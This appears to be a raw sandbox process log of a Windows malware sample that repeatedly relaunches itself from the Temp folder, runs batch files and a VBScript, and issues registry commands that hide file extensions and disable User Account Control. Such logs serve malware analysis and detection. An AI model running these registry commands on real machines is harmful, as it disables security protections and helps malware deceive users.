C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qGYUAEUk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zKcUYggM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xEQkcEkI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BqQAYwEw.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eWgUMwoE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cOoIMYYI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OOEYIgwg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OKgQsgEk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JKgMgQcc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TKQAkAUo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zkosQcAg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DYgcoEss.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gWEMAkMU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sCoEEEEo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AQwMgsMs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RmwkwMII.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XSsMEssE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vkoYsscI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YesIsAkw.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

